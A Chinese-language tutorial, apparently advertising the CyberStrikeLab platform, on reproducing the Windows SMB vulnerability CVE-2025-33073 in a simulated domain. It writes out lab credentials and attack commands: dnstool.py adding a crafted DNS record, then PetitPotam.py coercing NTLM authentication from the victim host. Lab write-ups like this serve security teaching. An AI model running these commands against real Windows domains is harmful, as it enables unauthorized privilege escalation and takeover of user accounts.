漏洞背景
2025年6月10日,微软发布了每月例行的安全补丁更新。在此次更新中,编号为CVE-2025-33073的严重漏洞引起了业界广泛的关注和重视。微软官方对该漏洞的描述为SMB客户端特权提升漏洞。然而,经过深入分析发现,该漏洞的威胁程度远远超出了普通意义上的“权限提升”范畴。
该漏洞存在于Windows SMB中,由于访问控制不当,具有普通域用户权限的攻击者可以通过添加恶意的DNS记录并强制域内计算机(域控除外)进行解析来获取域内所有用户的权限,从而达到提权的目的。
环境搭建
目前CyberStrikeLab仿真平台已支持漏洞复现,现在访问即可限时免费轻松复现~
靶机地址:https://www.cyberstrikelab.com/#/scene/detail/42
- 攻击机器kali:10.6.6.10 (所有需要用到的工具均已集成在机器中)
- 受害机器:10.6.6.88(CS.cyberstrikelab.com)
- DC:10.6.6.55 (DC.cyberstrikelab.com)
复现步骤
1.打开平台,点击开启仿真环境靶机
地址:https://www.cyberstrikelab.com/#/scene/detail/42
2.开启后下载openvpn配置文件并连接openvpn
图片
3.使用ssh工具连接攻击机器kali
图片
4.添加一条DNS记录
python3 dnstool.py -u cyberstrikelab.com\\cslab -p "cs1ab@wwe" -r CS1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 10.6.6.10 --action add 10.6.6.55
图片
5.启动监听
图片
6.进行强制NTLM认证
python3 PetitPotam.py -d cyberstrikelab.com -u cslab -p cs1ab@wwe CS1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 10.6.6.88
图片
7.回显命令
图片
当然这里我们也给大家准备了flag,大家可以在平台上提交
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论